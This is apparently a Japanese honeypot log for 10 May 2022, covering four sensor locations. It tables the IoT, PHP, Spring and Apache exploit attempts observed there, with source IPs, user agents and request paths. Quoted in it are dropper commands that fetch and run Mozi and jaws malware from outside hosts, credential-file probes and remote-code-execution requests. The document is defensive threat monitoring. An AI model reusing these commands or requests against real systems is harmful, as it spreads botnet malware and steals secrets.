ハニーポット(仮) 観測記録 2022/05/10分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.awsへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
aiohttpによるスキャン行為
Laravelへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://210.89.39.104:57591/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Laravelへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget a.tigoinari.tk/arm7; sh /tmp/arm7
cd /tmp; rm -rf *; wget cnc.krakenbit.net/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 209.141.59.94/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:222 (前日比:158)
US:総アクセス数:71 (前日比:-95)
UK:総アクセス数:49 (前日比:-231)
SG:総アクセス数:76 (前日比:-347)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 5.252.194.39 | Russia |
1 | 18.207.135.238 | United States |
1 | 20.62.13.13 | United States |
151 | 20.89.16.104 | United States |
1 | 20.126.42.244 | United States |
1 | 41.142.90.62 | Morocco |
6 | 45.9.20.101 | Russia |
1 | 45.61.188.169 | United States |
1 | 45.134.144.84 | Hong Kong |
1 | 46.249.33.53 | Netherlands |
1 | 62.233.50.179 | Russia |
2 | 89.248.165.24 | United Kingdom |
11 | 95.214.235.205 | Ukraine |
1 | 103.183.33.127 | private ip address |
1 | 103.192.80.142 | New Zealand |
1 | 107.189.162.183 | United States |
2 | 109.237.103.118 | Russia |
1 | 115.135.153.234 | Malaysia |
2 | 121.46.25.189 | China |
7 | 135.125.246.110 | France |
5 | 135.125.246.189 | France |
1 | 137.184.122.128 | United States |
1 | 139.162.145.250 | Netherlands |
2 | 157.245.70.127 | United States |
1 | 159.223.180.164 | United States |
1 | 165.227.178.254 | United States |
1 | 178.62.246.219 | United States |
8 | 185.254.196.217 | Ukraine |
1 | 192.241.201.192 | United States |
1 | 192.241.222.130 | United States |
1 | 197.61.241.226 | Egypt |
1 | 198.98.52.214 | United States |
1 | 205.210.31.12 | United States |
1 | 209.141.34.183 | United States |
1 | 212.30.33.157 | Lebanon |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
1 | 0xAbyssalDoesntExist |
1 | Hello, world |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
150 | Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
40 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) |
2 | Mozilla/5.0 zgrab/0.x |
1 | Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10 |
2 | python-requests/2.22.0 |
1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.59.1.el7.x86_64 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
39 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | //.aws/credentials/phpinfo |
HTTP/1.1 |
1 | GET | //.env.1 |
HTTP/1.1 |
1 | GET | //.env.bak |
HTTP/1.1 |
1 | GET | //.env.example.1 |
HTTP/1.1 |
1 | GET | //.env.example.suspected |
HTTP/1.1 |
1 | GET | //.env.example |
HTTP/1.1 |
1 | GET | //.env.suspected |
HTTP/1.1 |
1 | GET | //.env.txt |
HTTP/1.1 |
1 | GET | //.env_bak |
HTTP/1.1 |
1 | GET | //.env_old |
HTTP/1.1 |
1 | GET | //.env |
HTTP/1.1 |
1 | GET | //.env~ |
HTTP/1.1 |
1 | GET | ///.env |
HTTP/1.1 |
1 | GET | //api/.env.example |
HTTP/1.1 |
1 | GET | //api/.env |
HTTP/1.1 |
2 | GET | //app/.env.example |
HTTP/1.1 |
2 | GET | //app/.env |
HTTP/1.1 |
1 | GET | //app/frontend/.env.example |
HTTP/1.1 |
1 | GET | //app/frontend/.env |
HTTP/1.1 |
1 | GET | //application/.env.example |
HTTP/1.1 |
1 | GET | //application/.env |
HTTP/1.1 |
1 | GET | //aws[.]yml |
HTTP/1.1 |
1 | GET | //awstats/.env.example |
HTTP/1.1 |
1 | GET | //awstats/.env |
HTTP/1.1 |
1 | GET | //back-end/app/.env.example |
HTTP/1.1 |
1 | GET | //back-end/app/.env |
HTTP/1.1 |
1 | GET | //backend/.env.example |
HTTP/1.1 |
1 | GET | //backend/.env |
HTTP/1.1 |
1 | GET | //backup/.env.example |
HTTP/1.1 |
1 | GET | //backup/.env |
HTTP/1.1 |
1 | GET | //bootstrap/.env.example |
HTTP/1.1 |
1 | GET | //bootstrap/.env |
HTTP/1.1 |
1 | GET | //build/.env.example |
HTTP/1.1 |
1 | GET | //build/.env |
HTTP/1.1 |
1 | GET | //config/.env.example |
HTTP/1.1 |
1 | GET | //config/.env |
HTTP/1.1 |
1 | GET | //config/aws.yml |
HTTP/1.1 |
2 | GET | //core/.env.example |
HTTP/1.1 |
2 | GET | //core/.env |
HTTP/1.1 |
1 | GET | //data/.env.example |
HTTP/1.1 |
1 | GET | //data/.env |
HTTP/1.1 |
1 | GET | //database/.env.example |
HTTP/1.1 |
1 | GET | //database/.env |
HTTP/1.1 |
1 | GET | //demo/.env.example |
HTTP/1.1 |
1 | GET | //demo/.env |
HTTP/1.1 |
1 | GET | //dev/.env.example |
HTTP/1.1 |
1 | GET | //dev/.env |
HTTP/1.1 |
1 | GET | //developer/.env.example |
HTTP/1.1 |
1 | GET | //developer/.env |
HTTP/1.1 |
1 | GET | //django_project_path/.env.example |
HTTP/1.1 |
1 | GET | //django_project_path/.env |
HTTP/1.1 |
1 | GET | //docker/.env.example |
HTTP/1.1 |
1 | GET | //docker/.env |
HTTP/1.1 |
1 | GET | //docs/.env.example |
HTTP/1.1 |
1 | GET | //docs/.env |
HTTP/1.1 |
2 | GET | //en/.env.example |
HTTP/1.1 |
2 | GET | //en/.env |
HTTP/1.1 |
1 | GET | //env/.env.example |
HTTP/1.1 |
1 | GET | //env/.env |
HTTP/1.1 |
1 | GET | //env[.]txt |
HTTP/1.1 |
1 | GET | //environments/.env.example |
HTTP/1.1 |
1 | GET | //environments/.env |
HTTP/1.1 |
1 | GET | //example/.env.example |
HTTP/1.1 |
1 | GET | //example/.env |
HTTP/1.1 |
1 | GET | //examples/.env.example |
HTTP/1.1 |
1 | GET | //examples/.env |
HTTP/1.1 |
1 | GET | //front-app/.env.example |
HTTP/1.1 |
1 | GET | //front-app/.env |
HTTP/1.1 |
1 | GET | //front-empathy/.env.example |
HTTP/1.1 |
1 | GET | //front-empathy/.env |
HTTP/1.1 |
1 | GET | //front-end/.env.example |
HTTP/1.1 |
1 | GET | //front-end/.env |
HTTP/1.1 |
1 | GET | //front/.env.example |
HTTP/1.1 |
1 | GET | //front/.env |
HTTP/1.1 |
1 | GET | //frontend/.env.example |
HTTP/1.1 |
1 | GET | //frontend/.env |
HTTP/1.1 |
1 | GET | //info[.]php |
HTTP/1.1 |
1 | GET | //js/.env.example |
HTTP/1.1 |
1 | GET | //js/.env |
HTTP/1.1 |
1 | GET | //laravel/.env.example |
HTTP/1.1 |
1 | GET | //laravel/.env |
HTTP/1.1 |
1 | GET | //local/.env.example |
HTTP/1.1 |
1 | GET | //local/.env |
HTTP/1.1 |
1 | GET | //log/.env.example |
HTTP/1.1 |
1 | GET | //log/.env |
HTTP/1.1 |
1 | GET | //mail/.env.example |
HTTP/1.1 |
1 | GET | //mail/.env |
HTTP/1.1 |
1 | GET | //phpinfo[.]php |
HTTP/1.1 |
1 | GET | //prod/.env.example |
HTTP/1.1 |
1 | GET | //prod/.env |
HTTP/1.1 |
1 | GET | //production/.env.example |
HTTP/1.1 |
1 | GET | //production/.env |
HTTP/1.1 |
1 | GET | //project/.env.example |
HTTP/1.1 |
1 | GET | //project/.env |
HTTP/1.1 |
1 | GET | //pub/.env.example |
HTTP/1.1 |
1 | GET | //pub/.env |
HTTP/1.1 |
2 | GET | //public/.env.example |
HTTP/1.1 |
2 | GET | //public/.env |
HTTP/1.1 |
1 | GET | //rest/.env.example |
HTTP/1.1 |
1 | GET | //rest/.env |
HTTP/1.1 |
1 | GET | //route/.env.example |
HTTP/1.1 |
1 | GET | //route/.env |
HTTP/1.1 |
1 | GET | //src/.env.example |
HTTP/1.1 |
1 | GET | //src/.env |
HTTP/1.1 |
1 | GET | //stag/.env.example |
HTTP/1.1 |
1 | GET | //stag/.env |
HTTP/1.1 |
1 | GET | //staging/.env.example |
HTTP/1.1 |
1 | GET | //staging/.env |
HTTP/1.1 |
1 | GET | //staging2/.env.example |
HTTP/1.1 |
2 | GET | //staging2/.env |
HTTP/1.1 |
1 | GET | //static/.env.example |
HTTP/1.1 |
1 | GET | //static/.env |
HTTP/1.1 |
1 | GET | //stats/.env.example |
HTTP/1.1 |
1 | GET | //stats/.env |
HTTP/1.1 |
1 | GET | //storage/.env.example |
HTTP/1.1 |
1 | GET | //storage/.env |
HTTP/1.1 |
1 | GET | //system/.env.example |
HTTP/1.1 |
1 | GET | //system/.env |
HTTP/1.1 |
1 | GET | //temp/.env.example |
HTTP/1.1 |
1 | GET | //temp/.env |
HTTP/1.1 |
1 | GET | //test/.env.example |
HTTP/1.1 |
1 | GET | //test/.env |
HTTP/1.1 |
1 | GET | //tests/.env.example |
HTTP/1.1 |
1 | GET | //tests/.env |
HTTP/1.1 |
1 | GET | //thumb/.env.example |
HTTP/1.1 |
1 | GET | //thumbs/.env.example |
HTTP/1.1 |
1 | GET | //tmp/.env.example |
HTTP/1.1 |
1 | GET | //tmp/.env |
HTTP/1.1 |
1 | GET | //v1/.env.example |
HTTP/1.1 |
1 | GET | //v1/.env |
HTTP/1.1 |
1 | GET | //v2/.env.example |
HTTP/1.1 |
1 | GET | //v2/.env |
HTTP/1.1 |
2 | GET | //vendor/.env.example |
HTTP/1.1 |
2 | GET | //vendor/.env |
HTTP/1.1 |
1 | GET | //vendor/laravel/.env.example |
HTTP/1.1 |
1 | GET | //vendor/laravel/.env |
HTTP/1.1 |
2 | GET | //web/.env.example |
HTTP/1.1 |
2 | GET | //web/.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /seeyon/index.jsp |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//dyn[.]epicgifs[.]net/test6956.php |
HTTP/1.1 |
1 | GET | http[:]//us[.]vansto[.]net/verify.txt |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /editBlackAndWhiteList |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.88.7.238 | United States |
1 | 5.188.210.227 | Russia |
4 | 20.211.101.106 | United States |
11 | 45.9.20.101 | Russia |
1 | 45.61.188.169 | United States |
10 | 51.79.29.48 | Canada |
1 | 52.58.74.10 | United States |
1 | 58.255.208.4 | China |
2 | 89.248.165.24 | United Kingdom |
1 | 89.248.165.29 | United Kingdom |
6 | 89.248.165.52 | United Kingdom |
1 | 107.189.162.183 | United States |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 137.184.95.184 | United States |
1 | 137.184.122.128 | United States |
2 | 157.245.70.127 | United States |
2 | 162.142.125.220 | United States |
1 | 175.107.0.76 | Pakistan |
1 | 178.62.246.219 | United States |
9 | 185.254.196.223 | Ukraine |
1 | 192.241.213.6 | United States |
1 | 192.241.214.123 | United States |
1 | 192.241.215.240 | United States |
1 | 192.241.220.219 | United States |
1 | 193.56.29.124 | United Kingdom |
2 | 193.124.7.9 | Czechia |
1 | 205.210.31.31 | United States |
1 | 210.89.39.104 | India |
1 | 212.193.30.205 | Czechia |
UserAgent一覧
件数 | UserAgent |
---|---|
19 | - |
2 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozila/5.0 |
4 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
3 | Mozilla/5.0 zgrab/0.x |
1 | Python/3.7 aiohttp/3.7.4.post0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | - |
||
1 | MGLNDD_34.68.118.83_80\n |
||
3 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
1 | CONNECT | 85[.]206[.]160[.]115:80 |
HTTP/1.1 |
1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
28 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//210[.]89[.]39[.]104:57591/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
2 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
3 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.57.122.80 | Romania |
1 | 27.43.202.170 | China |
1 | 31.45.240.114 | Croatia |
11 | 45.9.20.101 | Russia |
1 | 49.68.181.83 | China |
1 | 61.53.81.219 | China |
1 | 89.248.165.29 | United Kingdom |
2 | 101.68.211.3 | China |
1 | 106.111.52.148 | China |
2 | 109.237.103.118 | Russia |
1 | 119.180.105.185 | China |
2 | 156.221.50.26 | Egypt |
1 | 157.245.115.242 | United States |
1 | 165.232.184.49 | United States |
1 | 167.94.138.120 | United States |
1 | 178.62.246.219 | United States |
1 | 182.117.24.81 | China |
2 | 185.203.117.135 | Cyprus |
1 | 188.165.87.111 | France |
1 | 192.241.197.18 | United States |
1 | 192.241.214.37 | United States |
1 | 192.241.214.208 | United States |
1 | 192.241.220.8 | United States |
1 | 205.210.31.34 | United States |
11 | 208.21.208.2 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
2 | Hello, world |
1 | Mozila/5.0 |
2 | Mozilla 5/0 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
1 | Mozilla/5.0 Gecko/20100101 |
3 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
1 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
2 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=rgjr7f98 |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/env |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
2 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
2 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /invoker/readonly |
HTTP/1.1 |
1 | GET | /jenkins/login |
HTTP/1.1 |
1 | GET | /login |
HTTP/1.1 |
3 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /script |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]43[.]202[.]170:50920/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /users/sign_in |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/phpunit.xml |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-login.php |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /_ignition/execute-solution |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.62.13.13 | United States |
2 | 20.92.243.94 | United States |
1 | 23.129.64.133 | United States |
1 | 34.201.84.130 | United States |
1 | 40.113.200.245 | United States |
2 | 40.113.247.75 | United States |
11 | 45.9.20.101 | Russia |
1 | 45.169.13.173 | Brazil |
1 | 46.249.33.53 | Netherlands |
5 | 50.31.21.9 | United States |
10 | 51.79.29.48 | Canada |
1 | 62.122.97.50 | Russia |
2 | 89.248.165.24 | United Kingdom |
2 | 89.248.165.29 | United Kingdom |
6 | 89.248.165.52 | United Kingdom |
4 | 94.102.49.193 | United Kingdom |
1 | 103.76.166.169 | India |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 134.209.40.100 | United States |
1 | 137.184.95.184 | United States |
1 | 137.184.122.128 | United States |
1 | 139.162.145.250 | Netherlands |
1 | 167.94.138.60 | United States |
1 | 183.136.225.42 | China |
1 | 185.220.100.241 | Germany |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.212.131 | United States |
1 | 192.241.219.161 | United States |
1 | 205.210.31.20 | United States |
1 | 206.189.224.36 | United States |
1 | 209.141.34.183 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
27 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
5 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52 |
24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
5 | - |
||
4 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
5 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
1 | CONNECT | 85[.]206[.]160[.]115:80 |
HTTP/1.1 |
1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
23 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /evox/about |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /nmaplowercheck1652115626 |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/arm7;sh+/tmp/arm7 |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ cnc.krakenbit.net/jaws;sh+/tmp/jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+209[.]141[.]59[.]94/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |